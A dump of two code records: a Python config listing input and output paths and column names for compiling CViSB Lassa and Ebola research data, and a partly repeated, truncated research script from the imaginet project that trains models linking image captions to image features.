'evalDate', 'dischargeDate', 'daysOnset', 'infectionDate', "age", "gender", "countryName", "elisa", "issue"] # DICTCOLS = ["patientID", "gID", "sID", "publicGID", "publicSID", "cohort", "outcome", "alternateIdentifier", # "issue"] # [GENERAL PARAMS] -------------------------------------------------------------------------------------- SAVEINIVIDUAL = False
# Config file to specify the inputs / outputs of CViSB data compilation from datetime import datetime today = datetime.today().strftime('%Y-%m-%d') DATADIR = "/Users/laurahughes/GitHub/cvisb_data/sample-viewer-api/src/static/data/" # [INPUTS] ---------------------------------------------------------------------------------------------- # --- id dictionary --- ID_DICT = f"{DATADIR}/output_data/patients/patients_2019-09-13_PRIVATE_dict.json" # --- patients --- # ACUTE_IDS_FILE = f"{DATADIR}/input_data/patient_rosters/additional_IDdict_v3_2019-10-23.csv" PATIENT_FILE = f"{DATADIR}/input_data/expt_summary_data/HLA/DisseminationData_31Aug20.xlsx" PATIENTS_UPDATEDBY = "<NAME>" PATIENTS_DATE = today PATIENTS_VERSION = 0.3 # --- hla --- HLA_FILE = f"{DATADIR}/input_data/expt_summary_data/HLA/Genotype_calls_2020-01-30.csv" HLA_DATE = "2020-11-23" HLA_VERSION = 0.3 HLA_UPDATEDBY = "<NAME>" # --- lassa virus seq --- ALIGNMENTS = [ {"virus": "Lassa", "segment": "S", "filename": "LASV_NP-GP_2020.11.23.fasta", "description": "Lassa virus NP-GP curated alignment", "curated": True, "url": "https://raw.githubusercontent.com/cvisb/curated-alignments/master/lassa/LASV_NP_GPC_2020.11.23.fasta"}, {"virus": "Lassa", "segment": "L", "filename": "LASV_L_Z_2020.11.23.fasta", "description": "Lassa virus L-Z curated alignment", "curated": True, "url": "https://raw.githubusercontent.com/cvisb/curated-alignments/master/lassa/LASV_L_Z_2020.11.23.fasta"}, {"virus": "Ebola", "segment": None, "filename": "EBOV_ORFs_2020.08.04.fasta", "curated": True, "description": "Ebola virus curated alignment", "url": "https://raw.githubusercontent.com/cvisb/curated-alignments/master/ebola/EBOV_ORFs_2020.08.04.fasta"} ] # LVIRAL_AAFILE = f"{DATADIR}/input_data/expt_summary_data/viral_seq/LASV_curated_aln_2019.09.11_duplicates_public.translated.fasta" LVIRAL_SFILE = f"{DATADIR}/input_data/expt_summary_data/viral_seq/LASV_NP_GPC_2020.11.23.fasta" LVIRAL_SFILE_UNCURATED = f"{DATADIR}/input_data/expt_summary_data/viral_seq/LASV_NP_GPC_non_curated_2020.11.23.fasta" LVIRAL_LFILE = f"{DATADIR}/input_data/expt_summary_data/viral_seq/LASV_L_Z_2020.11.23.fasta" LVIRAL_LFILE_UNCURATED = f"{DATADIR}/input_data/expt_summary_data/viral_seq/LASV_L_Z_non_curated_2020.11.23.fasta" LVIRAL_MDFILE = f"{DATADIR}/input_data/expt_summary_data/viral_seq/dataset_lasv_curated_2020.11.23.csv" LVIRAL_DATE = "2020-11-23" LVIRAL_VERSION = 0.3 LVIRAL_UPDATEDBY = "<NAME>" # --- ebola virus seq --- EVIRAL_ALIGNEDFILE = f"{DATADIR}/input_data/expt_summary_data/viral_seq/EBOV_ORFs_up_public_curated_2020.08.04.fasta" EVIRAL_FILE_UNCURATED = f"{DATADIR}/input_data/expt_summary_data/viral_seq/EBOV_ORFs_up_public_non_curated_2020.08.04.fasta" EVIRAL_MDFILE = f"{DATADIR}/input_data/expt_summary_data/viral_seq/dataset_ebola_up_public_curated_2020.08.03.csv" EVIRAL_DATE = "2020-11-16" EVIRAL_VERSION = 0.3 EVIRAL_UPDATEDBY = "<NAME>" # --- serology --- SEROLOGY_FILE = f"{DATADIR}/input_data/expt_summary_data/systems_serology/CViSB_SystemsSerology_v0.2_2019Nov22_LH.xlsx" SEROLOGY_DATE = today SEROLOGY_VERSION = 0.2 SEROLOGY_UPDATEDBY = "<NAME>" # [OUPUTS] ---------------------------------------------------------------------------------------------- EXPORTDIR = f"{DATADIR}/output_data" LOGFILE = f"{DATADIR}/output_data/log/{today}_cvisb-compliation.log" EXPTCOLS = ['privatePatientID', 'experimentID', 'sampleID', 'visitCode', 'batchID', 'experimentDate', 'measurementTechnique', 'measurementCategory', 'variableMeasured', 'includedInDataset', 'isControl', 'publisher', 'citation', 'creator', 'data', 'correction', 'version', 'updatedBy', 'dateModified', 'releaseDate', 'sourceFiles', 'dataStatus'] # for non-KGH patients: what info should be PATIENTCOLS = [ "patientID", "species", "alternateIdentifier", "hasPatientData", "hasSurvivorData", "dateModified", "updatedBy", "dataStatus", 'sourceFiles', "version", "cohort", "outcome", "country", "countryName", "location", "locationPrivate", "infectionYear", 'publisher', 'citation','correction'] # For all experiments, to relate sample <--> experiment SAMPLECOLS = ["creatorInitials", "sampleLabel", "sampleType", "species", "sampleID", "samplingDate", 'sourceFiles'] # All data download properties, from experiments DOWNLOADCOLS = ["name", "includedInDataset", "identifier", "contentUrl", "additionalType", "variableMeasured", "measurementTechnique", "measurementCategory", "dateModified", "experimentIDs", "contentUrlRepository", "contentUrlIdentifier", "citation", "updatedBy", 'publisher', "creator"] # Properties to export in patient ID dictionary DICTCOLS = ["patientID", "gID", "sID", "publicGID", "publicSID", "cohort", "outcome", "alternateIdentifier", 'evalDate', 'dischargeDate', 'daysOnset', 'infectionDate', "age", "gender", "countryName", "elisa", "issue"] # DICTCOLS = ["patientID", "gID", "sID", "publicGID", "publicSID", "cohort", "outcome", "alternateIdentifier", # "issue"] # [GENERAL PARAMS] -------------------------------------------------------------------------------------- SAVEINIVIDUAL = False
en
0.484559
# Config file to specify the inputs / outputs of CViSB data compilation # [INPUTS] ---------------------------------------------------------------------------------------------- # --- id dictionary --- # --- patients --- # ACUTE_IDS_FILE = f"{DATADIR}/input_data/patient_rosters/additional_IDdict_v3_2019-10-23.csv" # --- hla --- # --- lassa virus seq --- # LVIRAL_AAFILE = f"{DATADIR}/input_data/expt_summary_data/viral_seq/LASV_curated_aln_2019.09.11_duplicates_public.translated.fasta" # --- ebola virus seq --- # --- serology --- # [OUPUTS] ---------------------------------------------------------------------------------------------- # for non-KGH patients: what info should be # For all experiments, to relate sample <--> experiment # All data download properties, from experiments # Properties to export in patient ID dictionary # DICTCOLS = ["patientID", "gID", "sID", "publicGID", "publicSID", "cohort", "outcome", "alternateIdentifier", # "issue"] # [GENERAL PARAMS] --------------------------------------------------------------------------------------
1.908799
2
main.py
gchrupala/imaginet
7
6623584
<filename>main.py #!/usr/bin/env python from __future__ import division import sys sys.path.append('/home/gchrupala/repos/Passage') sys.path.append('/home/gchrupala/repos/neuraltalk') from passage.layers import Embedding, SimpleRecurrent, LstmRecurrent, GatedRecurrent #, Dense from layers import * from passage.costs import MeanSquaredError from imaginet import * from passage.preprocessing import Tokenizer, tokenize import passage.utils import passage.updates from passage.iterators import SortedPadded import imagernn.data_provider as dp import cPickle from scipy.spatial.distance import cosine, cdist import numpy import os.path import argparse import random from sklearn.feature_extraction.text import CountVectorizer from sklearn.linear_model import Ridge from sklearn.preprocessing import StandardScaler import json import gzip def main(): parser = argparse.ArgumentParser( description='Learn to rank images according to similarity to \ caption meaning') parser.add_argument('--predict', dest='predict', action='store_true', help='Run in prediction mode') parser.add_argument('--paraphrase', dest='paraphrase', action='store_true', help='Run in paraphrasing mode') parser.add_argument('--paraphrase_state', dest='paraphrase_state', default='hidden_multi', help='Which state to use for paraphrase retrieval (hidden_multi, hidden_vis, hidden_text, output_vis)') parser.add_argument('--extract_embeddings', dest='extract_embeddings', action='store_true', help='Extract embeddings from trained model') parser.add_argument('--project_words', dest='project_words', action='store_true', help='Project words from vocabulary to visual space') parser.add_argument('--model', dest='model', default='model.dat.gz', help='Path to write model to') parser.add_argument('--model_type', dest='model_type', default='simple', help='Type of model: (linear, simple, shared_embeddings, shared_all)') parser.add_argument('--character', dest='character', action='store_true', help='Character-level model') parser.add_argument('--zero_shot', dest='zero_shot', action='store_true', help='Disable visual signal for sentences containing words in zero_shot.pkl.gz') parser.add_argument('--tokenizer', dest='tokenizer', default='tok.pkl.gz', help='Path to write tokenizer to') parser.add_argument('--init_model', dest='init_model', default=None, help='Initialize model weights with model from given path') parser.add_argument('--init_tokenizer', dest='init_tokenizer', default=None, help='Use tokenizer from given path') parser.add_argument('--iter_predict', type=int, help='Model after that many iterations will be used to predict') parser.add_argument('--scramble', action='store_true', help='Scramble words in a test sentence') parser.add_argument('--distance', default='cosine', help='Distance metric to rank images') parser.add_argument('--dataset', dest='dataset', default='flickr8k', help='Dataset: flick8k, flickr30k, coco') parser.add_argument('--hidden_size', dest='hidden_size', type=int, default=256, help='size of the hidden layer') parser.add_argument('--embedding_size', dest='embedding_size', type=int, default=None, help='size of (word) embeddings') parser.add_argument('--hidden_type', default='gru', help='recurrent layer type: gru, lstm') parser.add_argument('--activation', default='tanh', help='activation of the hidden layer units') parser.add_argument('--out_activation', default='linear', help='Activation of output units') parser.add_argument('--cost', default='MeanSquaredError', help='Image prediction cost function') parser.add_argument('--scaler', dest='scaler', default='none', help='Method to scale targets (none, standard)') parser.add_argument('--rate', dest='rate', type=float, default=0.0002, help='Learning rate') parser.add_argument('--clipnorm', dest='clipnorm', type=float, default=0.0, help='Gradients with norm larger than clipnorm will be scaled') parser.add_argument('--alpha', dest='alpha', type=float, default=0.0, help='Interpolation parameter for LM cost vs image cost') parser.add_argument('--ridge_alpha', dest='ridge_alpha', type=float, default=1.0, help='Regularization for linear regression model') parser.add_argument('--non_interpolated', dest='non_interpolated', action='store_true', help='Use non-interpolated cost') parser.add_argument('--iterations', dest='iterations', type=int, default=10, help='Number of training iterations') parser.add_argument('--word_freq_threshold', dest='word_freq_threshold', type=int, default=10, help='Map words below this threshold to UNK') parser.add_argument('--shuffle', dest='shuffle', action='store_true', help='Shuffle training data') parser.add_argument('--random_seed', dest='random_seed', default=None, type=int, help='Random seed') parser.add_argument('--snapshot_freq', dest='snapshot_freq', type=int, default=5, help='How many iterations to save model') parser.add_argument('--batch_size', dest='batch_size', type=int, default=64, help='Batch size') args = parser.parse_args() if args.random_seed is not None: numpy.random.seed(args.random_seed) if args.project_words: project_words(args) elif args.predict and args.model_type == 'linear': test_linear(args) elif args.predict and args.model_type != 'linear': test(args) elif args.extract_embeddings: extract_embeddings(args) elif args.model_type == 'linear': train_linear(args) else: train(args) def train_linear(args): p = dp.getDataProvider(args.dataset) data = list(p.iterImageSentencePair(split='train')) texts = [ pair['sentence']['raw'] for pair in data ] images = [ pair['image']['feat'] for pair in data ] analyzer = 'char' if args.character else 'word' vectorizer = CountVectorizer(min_df=args.word_freq_threshold, analyzer=analyzer, lowercase=True, ngram_range=(1,1)) X = vectorizer.fit_transform(texts) scaler = StandardScaler() if args.scaler == 'standard' else NoScaler() sys.stderr.write("BOW computed\n") Y = scaler.fit_transform(numpy.array(images)) model = Ridge(solver='lsqr', alpha=args.ridge_alpha) sys.stderr.write("Starting training\n") model.fit(X,Y) sys.stderr.write("Saving model\n") cPickle.dump(model, gzip.open('model.dat.gz','w')) cPickle.dump(vectorizer, gzip.open('vec.pkl.gz','w')) cPickle.dump(scaler, gzip.open('vec.pkl.gz', 'w')) def test_linear(args): if args.random_seed is not None: numpy.random.seed(args.random_seed) D = Cdist() model = cPickle.load(gzip.open('model.dat.gz')) vectorizer = cPickle.load(gzip.open('vec.pkl.gz')) scaler = cPickle.load(gzip.open('scaler.pkl.gz')) real_stdout = sys.stdout with open('/dev/null', 'w') as f: sys.stdout = f d = dp.getDataProvider(args.dataset) sys.stdout = real_stdout pairs = list(d.iterImageSentencePair(split='val')) texts = [ pair['sentence']['raw'] for pair in pairs ] images = list(d.iterImages(split='val')) # With pairs we'd get duplicate images! X = vectorizer.transform(texts) Y_pred = numpy.asarray(model.predict(X), dtype='float32') # candidates are identical to Y_pred if args.paraphrase: #distances = D.cosine_distance(Y_pred, Y_pred) distances = cdist(Y_pred, Y_pred, metric='cosine') N = 0 score = 0.0 for j,row in enumerate(distances): imgid = pairs[j]['sentence']['imgid'] sentid = pairs[j]['sentence']['sentid'] best = numpy.argsort(row) top4 = sum([ imgid == pairs[b]['sentence']['imgid'] for b in best[0:5] if sentid != pairs[b]['sentence']['sentid'] ][0:4]) # exclude self score = score + top4/4.0 N = N+1 print args.iter_predict, N, score/N else: Y = numpy.array([ image['feat'] for image in images], dtype='float32') distances = D.cosine_distance(Y_pred, Y) errors = 0 N = 0 for j,row in enumerate(distances): imgid = pairs[j]['sentence']['imgid'] best = numpy.argsort(row) top5 = [ images[b]['imgid'] for b in best[:5] ] N = N+1 if imgid not in top5: errors = errors + 1 print errors, N, errors/N def train(args): zero_words = cPickle.load(gzip.open("zero_shot.pkl.gz")) if args.zero_shot else set() def maybe_zero(s, i): overlap = set(tokenize(s)).intersection(zero_words) if args.zero_shot and len(overlap) > 0: return numpy.zeros(i.shape) else: return i dataset = args.dataset tok_path = args.tokenizer model_path = args.model d = dp.getDataProvider(dataset) pairs = list(d.iterImageSentencePair(split='train')) if args.shuffle: numpy.random.shuffle(pairs) output_size = len(pairs[0]['image']['feat']) embedding_size = args.embedding_size if args.embedding_size is not None else args.hidden_size tokenizer = cPickle.load(gzip.open(args.init_tokenizer)) \ if args.init_tokenizer else Tokenizer(min_df=args.word_freq_threshold, character=args.character) sentences, images = zip(*[ (pair['sentence']['raw'], maybe_zero(pair['sentence']['raw'],pair['image']['feat'])) for pair in pairs ]) scaler = StandardScaler() if args.scaler == 'standard' else NoScaler() images = scaler.fit_transform(images) tokens = [ [tokenizer.encoder['PAD']] + sent + [tokenizer.encoder['END'] ] for sent in tokenizer.fit_transform(sentences) ] tokens_inp = [ token[:-1] for token in tokens ] tokens_out = [ token[1:] for token in tokens ] cPickle.dump(tokenizer, gzip.open(tok_path, 'w')) cPickle.dump(scaler, gzip.open('scaler.pkl.gz','w')) # Validation data valid_pairs = list(d.iterImageSentencePair(split='val')) valid_sents, valid_images = zip(*[ (pair['sentence']['raw'], pair['image']['feat']) for pair in valid_pairs ]) valid_images = scaler.transform(valid_images) valid_tokens = [ [ tokenizer.encoder['PAD'] ] + sent + [tokenizer.encoder['END'] ] for sent in tokenizer.transform(valid_sents) ] valid_tokens_inp = [ token[:-1] for token in valid_tokens ] valid_tokens_out = [ token[1:] for token in valid_tokens ] valid = (valid_tokens_inp, valid_tokens_out, valid_images) updater = passage.updates.Adam(lr=args.rate, clipnorm=args.clipnorm) if args.cost == 'MeanSquaredError': z_cost = MeanSquaredError elif args.cost == 'CosineDistance': z_cost = CosineDistance else: raise ValueError("Unknown cost") if args.hidden_type == 'gru': Recurrent = GatedRecurrent elif args.hidden_type == 'lstm': Recurrent = LstmRecurrent else: Recurrent = GatedRecurrent # if args.init_model is not None: # model_init = cPickle.load(open(args.init_model)) # def values(ps): # return [ p.get_value() for p in ps ] # # FIXME enable this for shared only embeddings # layers = [ Embedding(size=args.hidden_size, n_features=tokenizer.n_features, # weights=values(model_init.layers[0].params)), # Recurrent(seq_output=True, size=args.hidden_size, activation=args.activation, # weights=values(model_init.layers[1].params)), # Combined(left=Dense(size=tokenizer.n_features, activation='softmax', reshape=True, # weights=values(model_init.layers[2].left.params)), # right=Dense(size=output_size, activation=args.out_activation, # weights=values(model_init.layers[2].right.params)) # ) ] # else: # FIXME implement proper pretraining FIXME interpolated = True if not args.non_interpolated else False if args.model_type in ['add', 'mult', 'matrix']: if args.model_type == 'add': layer0 = Direct(size=embedding_size, n_features=tokenizer.n_features, op=Add) elif args.model_type == 'mult': layer0 = Direct(size=embedding_size, n_features=tokenizer.n_features, op=Mult) elif args.model_type == 'matrix': sqrt_size = embedding_size ** 0.5 if not sqrt_size.is_integer(): raise ValueError("Sqrt of embedding_size not integral for matrix model") layer0 = Direct(size=embedding_size, n_features=tokenizer.n_features, op=MatrixMult) layers = [ layer0, Dense(size=output_size, activation=args.out_activation, reshape=False) ] valid = (valid_tokens_inp, valid_images) model = RNN(layers=layers, updater=updater, cost=z_cost, iterator=SortedPadded(shuffle=False), verbose=1) model.fit(tokens_inp, images, n_epochs=args.iterations, batch_size=args.batch_size, len_filter=None, snapshot_freq=args.snapshot_freq, path=model_path, valid=valid) elif args.model_type == 'simple': layers = [ Embedding(size=embedding_size, n_features=tokenizer.n_features), Recurrent(seq_output=False, size=args.hidden_size, activation=args.activation), Dense(size=output_size, activation=args.out_activation, reshape=False) ] valid = (valid_tokens_inp, valid_images) model = RNN(layers=layers, updater=updater, cost=z_cost, iterator=SortedPadded(shuffle=False), verbose=1) model.fit(tokens_inp, images, n_epochs=args.iterations, batch_size=args.batch_size, len_filter=None, snapshot_freq=args.snapshot_freq, path=model_path, valid=valid) # FIXME need validation elif args.model_type == 'deep-simple': layers = [ Embedding(size=embedding_size, n_features=tokenizer.n_features), Recurrent(seq_output=True, size=args.hidden_size, activation=args.activation), Recurrent(seq_output=False, size=args.hidden_size, activation=args.activation), Dense(size=output_size, activation=args.out_activation, reshape=False) ] valid = (valid_tokens_inp, valid_images) model = RNN(layers=layers, updater=updater, cost=z_cost, iterator=SortedPadded(shuffle=False), verbose=1) model.fit(tokens_inp, images, n_epochs=args.iterations, batch_size=args.batch_size, len_filter=None, snapshot_freq=args.snapshot_freq, path=model_path, valid=valid) # FIXME need validation elif args.model_type == 'shared_all': if args.zero_shot: raise NotImplementedError # FIXME zero_shot not implemented layers = [ Embedding(size=embedding_size, n_features=tokenizer.n_features), Recurrent(seq_output=True, size=args.hidden_size, activation=args.activation), Combined(left=Dense(size=tokenizer.n_features, activation='softmax', reshape=True), right=Dense(size=output_size, activation=args.out_activation, reshape=False)) ] model = ForkedRNN(layers=layers, updater=updater, cost_y=CategoricalCrossEntropySwapped, cost_z=z_cost, alpha=args.alpha, size_y=tokenizer.n_features, verbose=1, interpolated=interpolated) model.fit(tokens_inp, tokens_out, images, n_epochs=args.iterations, batch_size=args.batch_size, snapshot_freq=args.snapshot_freq, path=model_path, valid=valid) elif args.model_type == 'shared_embeddings': layers = [ Embedding(size=embedding_size, n_features=tokenizer.n_features), Combined(left=Stacked([Recurrent(seq_output=True, size=args.hidden_size, activation=args.activation), Dense(size=tokenizer.n_features, activation='softmax', reshape=True)]), left_type='id', right=Stacked([Recurrent(seq_output=False, size=args.hidden_size, activation=args.activation), Dense(size=output_size, activation=args.out_activation, reshape=False)]), right_type='id') ] model = ForkedRNN(layers=layers, updater=updater, cost_y=CategoricalCrossEntropySwapped, cost_z=z_cost, alpha=args.alpha, size_y=tokenizer.n_features, verbose=1, interpolated=interpolated, zero_shot=args.zero_shot) model.fit(tokens_inp, tokens_out, images, n_epochs=args.iterations, batch_size=args.batch_size, snapshot_freq=args.snapshot_freq, path=model_path, valid=valid) cPickle.dump(model, gzip.open(model_path,"w")) def test(args): if args.random_seed is not None: numpy.random.seed(args.random_seed) def scramble(words): ixs = range(len(words)) random.shuffle(ixs) return [ words[ix] for ix in ixs ] testInfo = {'argv': sys.argv, 'dataset': args.dataset, 'scramble': args.scramble, 'model_type': args.model_type, 'alpha': args.alpha, 'iter_predict': args.iter_predict, 'task': 'paraphrase' if args.paraphrase else 'image', 'items': []} D = Cdist() dataset = args.dataset suffix = '' if args.iter_predict is None else ".{0}".format(args.iter_predict) model = cPickle.load(gzip.open('model.dat.gz' + suffix)) tokenizer = cPickle.load(gzip.open('tok.pkl.gz')) scaler = cPickle.load(gzip.open('scaler.pkl.gz')) real_stdout = sys.stdout with open('/dev/null', 'w') as f: sys.stdout = f d = dp.getDataProvider(args.dataset) sys.stdout = real_stdout pairs = list(d.iterImageSentencePair(split='val')) inputs = [ scramble(s) if args.scramble else s for s in tokenizer.transform([ pair['sentence']['raw'] for pair in pairs]) ] if args.paraphrase: candidates = tokenizer.transform([ pair['sentence']['raw'] for pair in pairs]) # No scrambling of candidates if args.paraphrase_state == 'output_vis': preds = model.predict(inputs) candidates_pred = model.predict(candidates) elif args.paraphrase_state == 'hidden_text': preds, _ = predict_h(model, inputs) candidates_pred, _ = predict_h(model, candidates) elif args.paraphrase_state == 'hidden_vis' and hasattr(model.layers[1], 'left'): _, preds = predict_h(model, inputs) _, candidates_pred = predict_h(model, candidates) elif args.paraphrase_state == 'hidden_vis' and not hasattr(model.layers[1], 'left'): preds = predict_h_simple(model, inputs) candidates_pred = predict_h_simple(model, candidates) elif args.paraphrase_state == 'hidden_multi': preds = numpy.hstack(predict_h(model, inputs)) candidates_pred = numpy.hstack(predict_h(model, candidates)) else: raise ValueError("Unknown state") distances = D.cosine_distance(preds, candidates_pred) #distances = cdist(preds, candidates_pred, metric='cosine') N = 0 score = 0.0 imgids = numpy.array([ pair['sentence']['imgid'] for pair in pairs ]) sentids = numpy.array([ pair['sentence']['sentid'] for pair in pairs]) for j,row in enumerate(distances): imgid = pairs[j]['sentence']['imgid'] sentid = pairs[j]['sentence']['sentid'] best = numpy.argsort(row) rank = numpy.where((imgids[best] == imgid) * (sentids[best] != sentid))[0][0] + 1 top4 = [ pairs[b]['sentence']['imgid'] for b in best[0:5] if sentid != pairs[b]['sentence']['sentid'] ][0:4] # exclude self top4sent = [ pairs[b]['sentence']['sentid'] for b in best[0:5] if sentid != pairs[b]['sentence']['sentid'] ][0:4] score = score + sum([i == imgid for i in top4 ])/4.0 N = N+1 itemInfo = {'sentid':sentid, 'imgid': imgid, 'score': sum([i == imgid for i in top4 ])/4.0, 'rank': rank, 'topn': top4 , 'topnsentid': top4sent, 'input': tokenizer.inverse_transform([inputs[j]])[0]} testInfo['items'].append(itemInfo) print args.iter_predict, N, score/N else: preds = model.predict(inputs) images = list(d.iterImages(split='val')) distances = D.cosine_distance(preds, scaler.transform([image['feat'] for image in images ])) errors = 0 N = 0 imgids = numpy.array([ img['imgid'] for img in images ]) for j,row in enumerate(distances): imgid = pairs[j]['sentence']['imgid'] sentid = pairs[j]['sentence']['sentid'] best = numpy.argsort(row) rank = numpy.where(imgids[best] == imgid)[0][0] + 1 top5 = [ images[b]['imgid'] for b in best[:5] ] N = N+1 if imgid not in top5: errors = errors + 1 itemInfo = {'sentid':sentid, 'imgid': imgid, 'score': float(imgid in top5), 'rank': rank, 'topn': top5, 'input':tokenizer.inverse_transform([inputs[j]])[0] } testInfo['items'].append(itemInfo) print args.iter_predict, errors, N, errors/N testInfoPath = 'testInfo-task={0}-scramble={1}-iter_predict={2}.json.gz'.format(testInfo['task'], testInfo['scramble'], testInfo['iter_predict']) json.dump(testInfo, gzip.open(testInfoPath,'w')) def project_words(args): suffix = '' if args.iter_predict is None else ".{0}".format(args.iter_predict) model = cPickle.load(gzip.open('model.dat.gz' + suffix)) tokenizer = cPickle.load(gzip.open('tok.pkl.gz')) scaler = cPickle.load(gzip.open('scaler.pkl.gz')) exclude = ['PAD','END','UNK'] words, indexes = zip(*[ (w,i) for (w,i) in tokenizer.encoder.iteritems() if w not in exclude ]) inputs = [ [tokenizer.encoder['PAD'], i, tokenizer.encoder['END']] for i in indexes ] # FIXME actually for training we don't have END preds = scaler.inverse_transform(model.predict(inputs)) proj = dict((words[i], preds[i]) for i in range(0, len(words))) cPickle.dump(proj, gzip.open("proj.pkl.gz" + suffix, "w")) def extract_embeddings(args): tokenizer = cPickle.load(gzip.open('tok.pkl.gz')) #scaler = cPickle.load(open('scaler.pkl')) suffix = '' if args.iter_predict is None else ".{0}".format(args.iter_predict) model = cPickle.load(gzip.open('model.dat.gz' + suffix)) embeddings = model.layers[0].params[0].get_value() table = dict((word, embeddings[i]) for i,word in tokenizer.decoder.iteritems() if word not in ['END','PAD','UNK'] ) cPickle.dump(table, gzip.open('embeddings.pkl.gz' + suffix, 'w')) class Cdist(): def __init__(self): self.U = T.matrix('U') self.V = T.matrix('V') self.U_norm = self.U / self.U.norm(2, axis=1).reshape((self.U.shape[0], 1)) self.V_norm = self.V / self.V.norm(2, axis=1).reshape((self.V.shape[0], 1)) self.W = T.dot(self.U_norm, self.V_norm.T) self.cosine = theano.function([self.U, self.V], self.W) def cosine_distance(self, A, B): return 1 - self.cosine(A, B) main()
<filename>main.py #!/usr/bin/env python from __future__ import division import sys sys.path.append('/home/gchrupala/repos/Passage') sys.path.append('/home/gchrupala/repos/neuraltalk') from passage.layers import Embedding, SimpleRecurrent, LstmRecurrent, GatedRecurrent #, Dense from layers import * from passage.costs import MeanSquaredError from imaginet import * from passage.preprocessing import Tokenizer, tokenize import passage.utils import passage.updates from passage.iterators import SortedPadded import imagernn.data_provider as dp import cPickle from scipy.spatial.distance import cosine, cdist import numpy import os.path import argparse import random from sklearn.feature_extraction.text import CountVectorizer from sklearn.linear_model import Ridge from sklearn.preprocessing import StandardScaler import json import gzip def main(): parser = argparse.ArgumentParser( description='Learn to rank images according to similarity to \ caption meaning') parser.add_argument('--predict', dest='predict', action='store_true', help='Run in prediction mode') parser.add_argument('--paraphrase', dest='paraphrase', action='store_true', help='Run in paraphrasing mode') parser.add_argument('--paraphrase_state', dest='paraphrase_state', default='hidden_multi', help='Which state to use for paraphrase retrieval (hidden_multi, hidden_vis, hidden_text, output_vis)') parser.add_argument('--extract_embeddings', dest='extract_embeddings', action='store_true', help='Extract embeddings from trained model') parser.add_argument('--project_words', dest='project_words', action='store_true', help='Project words from vocabulary to visual space') parser.add_argument('--model', dest='model', default='model.dat.gz', help='Path to write model to') parser.add_argument('--model_type', dest='model_type', default='simple', help='Type of model: (linear, simple, shared_embeddings, shared_all)') parser.add_argument('--character', dest='character', action='store_true', help='Character-level model') parser.add_argument('--zero_shot', dest='zero_shot', action='store_true', help='Disable visual signal for sentences containing words in zero_shot.pkl.gz') parser.add_argument('--tokenizer', dest='tokenizer', default='tok.pkl.gz', help='Path to write tokenizer to') parser.add_argument('--init_model', dest='init_model', default=None, help='Initialize model weights with model from given path') parser.add_argument('--init_tokenizer', dest='init_tokenizer', default=None, help='Use tokenizer from given path') parser.add_argument('--iter_predict', type=int, help='Model after that many iterations will be used to predict') parser.add_argument('--scramble', action='store_true', help='Scramble words in a test sentence') parser.add_argument('--distance', default='cosine', help='Distance metric to rank images') parser.add_argument('--dataset', dest='dataset', default='flickr8k', help='Dataset: flick8k, flickr30k, coco') parser.add_argument('--hidden_size', dest='hidden_size', type=int, default=256, help='size of the hidden layer') parser.add_argument('--embedding_size', dest='embedding_size', type=int, default=None, help='size of (word) embeddings') parser.add_argument('--hidden_type', default='gru', help='recurrent layer type: gru, lstm') parser.add_argument('--activation', default='tanh', help='activation of the hidden layer units') parser.add_argument('--out_activation', default='linear', help='Activation of output units') parser.add_argument('--cost', default='MeanSquaredError', help='Image prediction cost function') parser.add_argument('--scaler', dest='scaler', default='none', help='Method to scale targets (none, standard)') parser.add_argument('--rate', dest='rate', type=float, default=0.0002, help='Learning rate') parser.add_argument('--clipnorm', dest='clipnorm', type=float, default=0.0, help='Gradients with norm larger than clipnorm will be scaled') parser.add_argument('--alpha', dest='alpha', type=float, default=0.0, help='Interpolation parameter for LM cost vs image cost') parser.add_argument('--ridge_alpha', dest='ridge_alpha', type=float, default=1.0, help='Regularization for linear regression model') parser.add_argument('--non_interpolated', dest='non_interpolated', action='store_true', help='Use non-interpolated cost') parser.add_argument('--iterations', dest='iterations', type=int, default=10, help='Number of training iterations') parser.add_argument('--word_freq_threshold', dest='word_freq_threshold', type=int, default=10, help='Map words below this threshold to UNK') parser.add_argument('--shuffle', dest='shuffle', action='store_true', help='Shuffle training data') parser.add_argument('--random_seed', dest='random_seed', default=None, type=int, help='Random seed') parser.add_argument('--snapshot_freq', dest='snapshot_freq', type=int, default=5, help='How many iterations to save model') parser.add_argument('--batch_size', dest='batch_size', type=int, default=64, help='Batch size') args = parser.parse_args() if args.random_seed is not None: numpy.random.seed(args.random_seed) if args.project_words: project_words(args) elif args.predict and args.model_type == 'linear': test_linear(args) elif args.predict and args.model_type != 'linear': test(args) elif args.extract_embeddings: extract_embeddings(args) elif args.model_type == 'linear': train_linear(args) else: train(args) def train_linear(args): p = dp.getDataProvider(args.dataset) data = list(p.iterImageSentencePair(split='train')) texts = [ pair['sentence']['raw'] for pair in data ] images = [ pair['image']['feat'] for pair in data ] analyzer = 'char' if args.character else 'word' vectorizer = CountVectorizer(min_df=args.word_freq_threshold, analyzer=analyzer, lowercase=True, ngram_range=(1,1)) X = vectorizer.fit_transform(texts) scaler = StandardScaler() if args.scaler == 'standard' else NoScaler() sys.stderr.write("BOW computed\n") Y = scaler.fit_transform(numpy.array(images)) model = Ridge(solver='lsqr', alpha=args.ridge_alpha) sys.stderr.write("Starting training\n") model.fit(X,Y) sys.stderr.write("Saving model\n") cPickle.dump(model, gzip.open('model.dat.gz','w')) cPickle.dump(vectorizer, gzip.open('vec.pkl.gz','w')) cPickle.dump(scaler, gzip.open('vec.pkl.gz', 'w')) def test_linear(args): if args.random_seed is not None: numpy.random.seed(args.random_seed) D = Cdist() model = cPickle.load(gzip.open('model.dat.gz')) vectorizer = cPickle.load(gzip.open('vec.pkl.gz')) scaler = cPickle.load(gzip.open('scaler.pkl.gz')) real_stdout = sys.stdout with open('/dev/null', 'w') as f: sys.stdout = f d = dp.getDataProvider(args.dataset) sys.stdout = real_stdout pairs = list(d.iterImageSentencePair(split='val')) texts = [ pair['sentence']['raw'] for pair in pairs ] images = list(d.iterImages(split='val')) # With pairs we'd get duplicate images! X = vectorizer.transform(texts) Y_pred = numpy.asarray(model.predict(X), dtype='float32') # candidates are identical to Y_pred if args.paraphrase: #distances = D.cosine_distance(Y_pred, Y_pred) distances = cdist(Y_pred, Y_pred, metric='cosine') N = 0 score = 0.0 for j,row in enumerate(distances): imgid = pairs[j]['sentence']['imgid'] sentid = pairs[j]['sentence']['sentid'] best = numpy.argsort(row) top4 = sum([ imgid == pairs[b]['sentence']['imgid'] for b in best[0:5] if sentid != pairs[b]['sentence']['sentid'] ][0:4]) # exclude self score = score + top4/4.0 N = N+1 print args.iter_predict, N, score/N else: Y = numpy.array([ image['feat'] for image in images], dtype='float32') distances = 